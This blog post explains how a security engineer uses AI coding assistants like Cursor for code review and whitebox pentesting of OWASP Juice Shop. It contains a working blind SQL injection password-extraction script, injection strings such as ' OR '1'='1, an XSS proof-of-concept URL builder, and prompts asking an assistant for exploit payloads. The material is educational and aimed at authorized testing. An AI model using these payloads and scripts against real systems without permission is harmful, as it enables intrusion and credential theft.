Introduction

AI coding tools have fundamentally changed how developers write code, but their impact on security engineering workflows is still being explored. As someone who spends significant time reviewing code for vulnerabilities and conducting whitebox penetration tests, I’ve found that tools like Cursor can significantly enhance both the speed and thoroughness of security assessments.

This post covers practical strategies for integrating AI coding assistants into security code review and whitebox penetration testing workflows, based on real-world experience using these tools in production environments.

The Security Engineer’s Dilemma

Application and product security engineers face a number of challenges:

- Scale: Modern applications can contain millions of lines of code spread across multiple repositories

- Context switching: Security engineers often support numerous codebases and frequently switch between them

- Business logic errors: Identifying business logic errors across large codebases, which pattern-based tools like SAST scanners would never find

- Time constraints: Balancing thorough review and testing with other projects

AI coding tools can serve as an “extra brain” for a security engineer and help with each of these challenges.

Limitations and Considerations

What AI Gets Wrong

Before we dive deeper, I want to note that there are limitations here:

- Models may hallucinate: Ever spent an hour digging into the deep magic of Salesforce’s proprietary language, Apex, because ChatGPT and Cursor both hallucinated the same incorrect syntax? Fun story…

- Context blindness: Assistants can miss business logic flaws that require knowledge from outside the codebase (although you can mitigate this by cloning a particularly important repo or two and temporarily moving the directory inside the codebase you’re working on)

- Bias toward common patterns: Assistants may miss novel or sophisticated attack vectors, since LLMs work by statistical prediction based on what they’ve seen before

- Not a substitute for real security review: Assistants are best used as a reference or a more advanced search engine for the code, rather than an automated replacement for actual security review or testing. Trust me, I’ve tried it for science. They suck at it.

Asking The Right Questions

The key to effective AI usage is asking the right questions and using the right prompts. As tempting as it is to just type “pls gib sekurities” and hope the AI gets it right while you play video games all day, surprise, surprise: that ain’t gonna cut it.

Secure Code Review

When using an AI to assist with code review, the key is to ask it to review specific functionality rather than the entire codebase. Instead of asking “Are there any security vulnerabilities in this codebase?”, think about what attack vectors the codebase exposes. Better yet, go back to your threat model and pull out the vectors you identified there, then ask the assistant to review the functionality behind each one.

Examples:

Where is the authorization logic implemented in this codebase? Find it, and assess it for potential authorization flaws or oversights that might result in authorization working differently than intended.

This codebase interacts with a SQL database. Please locate where queries are executed and evaluate whether parameterization is used correctly.
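When the assistant reports back, it helps to know exactly what “parameterization used correctly” looks like. Here’s a minimal sketch using Python’s standard-library `sqlite3` module (a throwaway in-memory database with a hypothetical `users` table, not the stack of any real codebase) contrasting a string-appended query with a parameterized one:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway in-memory database with a hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com")],
    )
    return conn


def find_user_unsafe(conn: sqlite3.Connection, username: str) -> list:
    # VULNERABLE: user input is string-appended into the SQL text, so a quote
    # character can change the structure of the query itself.
    query = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> list:
    # Parameterized: the driver passes username as data via the ? placeholder,
    # so it is never interpreted as SQL syntax.
    query = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print(find_user_unsafe(db, payload))  # every row comes back
    print(find_user_safe(db, payload))    # no rows: treated as a literal username
```

Running it shows the injected `' OR '1'='1` returning every row from the concatenated version and nothing from the parameterized one. That difference is what you want the assistant to confirm at every call site it finds.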

Determine whether this JWT validation logic correctly performs expiration checks, signature validation, and issuer checks.
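As a yardstick for the assistant’s verdict, here’s what those three checks look like written out by hand: a minimal, stdlib-only Python sketch for HS256 tokens. The algorithm, secret, and issuer are assumptions for illustration, and production code should rely on a maintained JWT library instead; the point is to show what a complete validation path contains so you can spot which piece is missing.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional


def b64url_encode(data: bytes) -> str:
    # JWT segments are base64url without "=" padding.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # Restore the padding that JWTs strip before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Build an HS256 token; only used here to produce test input."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes, issuer: str, now: Optional[float] = None) -> dict:
    """Return the claims if signature, expiration and issuer all check out; else raise ValueError."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    # Pin the algorithm rather than trusting the token's own header ("alg": "none" tricks).
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        raise ValueError("unexpected algorithm")
    # 1. Signature: recompute the HMAC over "header.payload", compare in constant time.
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(payload_b64))
    # 2. Expiration: reject at or after exp; a missing exp is treated as a failure (a policy choice).
    current = time.time() if now is None else now
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or current >= exp:
        raise ValueError("expired or missing exp")
    # 3. Issuer: must match the expected value exactly.
    if claims.get("iss") != issuer:
        raise ValueError("wrong issuer")
    return claims
```

Gaps worth asking the assistant about specifically: decoding the payload without verifying the signature, comparing signatures with `==` instead of a constant-time compare, and trusting the `alg` value from the token header.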

I’m most fluent in Python. Can you give me the Python equivalent of this JavaScript function, and explain which JavaScript nuances might not translate well to Python?

Penetration Testing

Using an AI assistant for whitebox penetration testing works much the same way. The key is to use it to analyze things you’ve already found. Rather than asking “How do I exploit this codebase?”, ask it about specific components. Especially on an unfamiliar codebase, it can help you locate the specific logic you need to analyze for vulnerabilities. It can also validate your assumptions about how something works, although it’s a good idea to double-check, or ask for sources, when it describes how a specific library behaves (see the side trip into Apex land above).

Some examples of good prompts for assisting with penetration tests:

The /users endpoint in this code appears to error out whenever I include a single-quote character in the username. Find the code that would throw this error, and determine whether this might indicate a lack of proper sanitization.

I’ve identified a SQL injection vulnerability in this SQL statement, in the username parameter that is string-appended to the query here. Please give some examples of potential blind SQL injection payloads that would exploit that vulnerability to get information about user passwords.
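To sanity-check the payloads an assistant hands back, it helps to see the boolean-based blind technique end to end. Below is a self-contained Python sketch against a hypothetical in-memory SQLite table (the table, columns, credentials, and function names are all invented): `user_exists` stands in for a vulnerable endpoint that string-appends the username and only reveals whether a row matched, and `extract_password` recovers the password one character at a time with `SUBSTR`. The string functions and comment syntax are SQLite’s; other database engines differ, which is exactly the kind of detail to ask the assistant about.

```python
import sqlite3
import string


def make_target() -> sqlite3.Connection:
    """Hypothetical stand-in for the vulnerable app's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def user_exists(conn: sqlite3.Connection, username: str) -> bool:
    """The vulnerable 'endpoint': string-appended SQL, and only a yes/no answer comes back."""
    query = "SELECT 1 FROM users WHERE username = '" + username + "'"
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.OperationalError:
        # A lone single quote leaves the string literal unterminated and the query errors out.
        return False


def oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean-based blind payload: the admin row only matches if `condition` is true."""
    return user_exists(conn, f"admin' AND ({condition}) -- ")


def extract_password(conn: sqlite3.Connection, max_len: int = 64) -> str:
    charset = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            literal = ch.replace("'", "''")  # escape quotes inside the SQL string literal
            if oracle(conn, f"SUBSTR(password, {pos}, 1) = '{literal}'"):
                recovered += ch
                break
        else:
            break  # nothing matched at this position, so we've run past the end
    return recovered


if __name__ == "__main__":
    print(extract_password(make_target()))
```

Running it prints the recovered password (`s3cret` for the sample row). Note that `user_exists(conn, "'")` returns `False` because the stray quote raises an `OperationalError`, the same symptom as the single-quote error in the `/users` prompt above.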

Additionally, coding assistants can make building custom exploits trivial. Sure, you could probably write a custom Python script to exploit that XSS vulnerability you found all on your own, but can you do it in 5 minutes? Will the exploit script have a nice user interface with error handling and ASCII art kittens?
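For a sense of scale, here’s the kind of small, throwaway tool an assistant can produce in a few minutes: a hypothetical Python CLI that builds a reflected-XSS proof-of-concept URL by URL-encoding a payload into a query parameter, complete with argument parsing, error handling, and the obligatory kitten. The default target URL, parameter name, and payload are placeholders, not a real Juice Shop endpoint, and the script only constructs the link; it sends nothing over the network.

```python
import argparse
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

KITTEN = r"""
 /\_/\
( o.o )  PoC ready, meow
 > ^ <
"""

# Placeholder defaults: hypothetical target and parameter, not a real Juice Shop endpoint.
DEFAULT_URL = "http://localhost:3000/hypothetical-search"
DEFAULT_PARAM = "q"
DEFAULT_PAYLOAD = "<img src=x onerror=alert(document.domain)>"


def build_poc_url(base_url: str, param: str, payload: str = DEFAULT_PAYLOAD) -> str:
    """Return base_url with `payload` URL-encoded into query parameter `param`."""
    parts = urlsplit(base_url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError(f"not an http(s) URL: {base_url!r}")
    # Keep any existing query parameters, replacing the target one if it's already there.
    query = [(k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True) if k != param]
    query.append((param, payload))
    return urlunsplit((parts.scheme, parts.netloc, parts.path, urlencode(query), parts.fragment))


def main(argv=None) -> None:
    parser = argparse.ArgumentParser(description="Build a reflected-XSS proof-of-concept URL.")
    parser.add_argument("url", nargs="?", default=DEFAULT_URL, help="page that reflects the parameter")
    parser.add_argument("param", nargs="?", default=DEFAULT_PARAM, help="reflected query parameter name")
    parser.add_argument("--payload", default=DEFAULT_PAYLOAD, help="HTML/JavaScript payload to inject")
    args = parser.parse_args(argv)
    try:
        poc = build_poc_url(args.url, args.param, args.payload)
    except ValueError as err:
        parser.error(str(err))  # prints usage plus the message, then exits with status 2
    print(KITTEN)
    print(poc)


if __name__ == "__main__":
    main()
```

The design choice worth noticing is that the payload goes through `urlencode` rather than string concatenation, so characters like `<`, `>` and `/` arrive at the target exactly as intended.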

Real Example

Let’s analyze ye olde OWASP Juice Shoppe with help from an AI assistant. For this demo I’m going to use Cursor (at the time of writing, Cursor is my preferred coding assistant, pricing shenanigans notwithstanding).

If you’d like to follow along at home and actually try the exploits your AI assistant surfaces, you can get a short-lived Juice Shop instance running quickly with `docker run --rm -p 3000:3000 -d bkimminich/juice-shop`. Don’t forget to clone the codebase too, since having the AI assistant analyze the codebase is, like, the entire point of this exercise. So you’ll probably need the actual codebase.
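Because `-d` runs the container detached, the command returns before the app is actually serving. If you’re scripting your testing, a small helper like this hypothetical, stdlib-only Python function can poll the mapped port until Juice Shop answers (the URL and timings are assumptions; adjust them to your setup):

```python
import http.client
import time
import urllib.request


def wait_for_instance(url: str = "http://localhost:3000/", timeout: float = 60.0, interval: float = 2.0) -> bool:
    """Poll `url` until it returns HTTP 200, giving up after roughly `timeout` seconds."""
    deadline = time.monotonic() + timeout
    while True:
        try:
            with urllib.request.urlopen(url, timeout=interval) as resp:
                if resp.status == 200:
                    return True
        except (OSError, http.client.HTTPException):
            # URLError, refused connections, resets and timeouts are OSError subclasses;
            # the container is probably still starting (or isn't running at all).
            pass
        if time.monotonic() >= deadline:
            return False
        time.sleep(interval)
```

For example, call `wait_for_instance()` right after `docker run`; it returns `True` once `http://localhost:3000/` responds with HTTP 200, or `False` if that doesn’t happen within the timeout.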

Let’s start with a braindead query and see how it does. After all:



The query:

It’s like even the model realizes we’re phoning it in. In true apathetic fashion, let’s give it as little guidance as possible (putting this response in quote form rather than a screenshot due to length):

Chase: manual

Cursor: Great! For a manual security review, I’ll look for common vulnerability patterns in your codebase, such as:

- Hardcoded secrets/credentials

- SQL injection

- Cross-Site Scripting (XSS)

- Cross-Site Request Forgery (CSRF)

- Insecure file uploads

- Insecure authentication/authorization

- Use of unsafe APIs or functions

- Insecure deserialization

- Directory traversal

- Information disclosure

Given the size of your project, I’ll start by searching for high-risk patterns and files that are most likely to contain vulnerabilities (e.g., routes, models, services, and config files).

I’ll begin with:

- Hardcoded secrets/credentials

- Dangerous function usage (e.g., eval, exec, child_process, etc.)

- SQL/NoSQL injection patterns

- XSS in templates and API responses

- Insecure file upload handling

Let’s start with the first two. I’ll search for hardcoded secrets and dangerous function usage.

Here are the initial findings from the manual review for security vulnerabilities:

- Hardcoded Secrets/Credentials

Most matches are in test files (e.g., token12345, passwords, JWTs, etc.), which is expected and not a direct risk for production.

No obvious hardcoded secrets or credentials found in main application code from the initial search. However, further review of config files and environment variable usage is recommended for a thorough check.

- Dangerous Function Usage (Potential Code Injection/RCE)

`eval` usage:

- `routes/captcha.ts`: `const answer = eval(expression).toString()`

- `routes/userProfile.ts`: `username = eval(code)`

- `routes/b2bOrder.ts`: `vm.runInContext('safeEval(orderLinesData)', sandbox, { timeout: 2000 })`

- `test/cypress/e2e/contact.spec.ts`: `const answer = eval(val).toString()`

- `test/cypress/e2e/basket.spec.ts`: `win.eval(...)`

`child_process.exec` usage:

- `test/cypress/e2e/profile.spec.ts`: Executes a shell command via `child_process.exec` (in a test context).

`setTimeout`/`setInterval`/`Function` usage: Found in various places, but these are not inherently dangerous unless user input is passed to them.

The most critical are the `eval` and `vm.runInContext` usages in the main application code (not tests), as these can lead to Remote Code Execution (RCE) if user input is not properly sanitized.

Next Steps:

- Review the context and input validation for each `eval`/`vm.runInContext` usage in the main app code.

- Check for SQL/NoSQL injection patterns in route handlers and database queries.

- Look for XSS vulnerabilities in template rendering and API responses.

- Review file upload handling for security issues.

Would you like me to:

- Dive deeper into the `eval`/`vm.runInContext` usages to assess exploitability?

- Move on to SQL/NoSQL injection and XSS checks?

- Or focus on another area first?

OK, that was actually pretty good for a first swing. Granted, this codebase is an explosion of vulnerabilities, but still, nice job, Cursor.
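For comparison, Cursor’s opening move (search for dangerous calls, then separate application code from tests) is easy to approximate with a few lines of Python. This is a rough sketch: the pattern list, skipped directories, test-file heuristic, and script name are assumptions chosen for illustration, and line-by-line regexes like these both over-report and miss things. What they can’t do is the part the assistant offered next: reading the surrounding code to judge whether user input actually reaches a given `eval`.

```python
import os
import re
import sys
from typing import Iterator, NamedTuple

# Illustrative, far-from-complete patterns for the "dangerous function usage" pass.
DANGEROUS = {
    "eval": re.compile(r"\beval\s*\("),
    "vm.runInContext": re.compile(r"\bvm\.runIn(?:New)?Context\s*\("),
    "new Function": re.compile(r"\bnew\s+Function\s*\("),
    # Bare exec(...) or child_process.exec(...); skips obj.exec(...) such as RegExp.exec.
    "exec": re.compile(r"\bchild_process\.exec(?:Sync)?\s*\(|(?<![\w.])exec(?:Sync)?\s*\("),
}
SOURCE_EXTENSIONS = (".js", ".ts")
SKIP_DIRS = {"node_modules", ".git", "dist", "build"}


class Finding(NamedTuple):
    path: str
    line_no: int
    label: str
    text: str
    is_test: bool


def looks_like_test(rel_path: str) -> bool:
    # Heuristic: anything under a "test" directory, or named *.spec.* / *.test.*.
    parts = rel_path.replace(os.sep, "/").split("/")
    return "test" in parts[:-1] or ".spec." in parts[-1] or ".test." in parts[-1]


def scan(root: str) -> Iterator[Finding]:
    """Yield one Finding per line of JS/TS source that matches a dangerous pattern."""
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune dependency and build directories in place so os.walk never descends into them.
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for filename in filenames:
            if not filename.endswith(SOURCE_EXTENSIONS):
                continue
            path = os.path.join(dirpath, filename)
            rel = os.path.relpath(path, root)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for line_no, line in enumerate(fh, start=1):
                    for label, pattern in DANGEROUS.items():
                        if pattern.search(line):
                            yield Finding(rel, line_no, label, line.strip(), looks_like_test(rel))


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: python find_dangerous.py <path-to-repo>")
    else:
        # Application code first, tests last, mirroring how the assistant prioritized them.
        for f in sorted(scan(sys.argv[1]), key=lambda f: (f.is_test, f.path, f.line_no)):
            print(f"[{'test' if f.is_test else 'app'}] {f.path}:{f.line_no}: {f.label}: {f.text}")
```

Run it as `python find_dangerous.py path/to/juice-shop` to get a rough list, application code first, that you can then hand to the assistant one finding at a time.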



Let’s try something more targeted (in a new chat, of course, so the model doesn’t know what a slacker I was being before). Note that because the README.md file is full of notes about how this is a CTF and intentionally insecure, I had to have it review very specific files to get realistic results. You wouldn’t need to do that in a real codebase.

Pretty solid. It explained how the functionality works and pointed out where the vulnerability is.

We could keep going, but rather than reading about me doing this, you should try it yourself.

Next Steps

If you’re interested in including AI assistants in your application security workflows:

- Try it out on an intentionally vulnerable codebase (like Juice Shop)

- Try assessing some of your actual codebases with an AI assistant (if your company’s policies allow it)

- Hack the World (as long as you get permission)

The goal isn’t to replace security engineering expertise, but to augment it with tools that can help us keep pace with the scale and complexity of modern applications.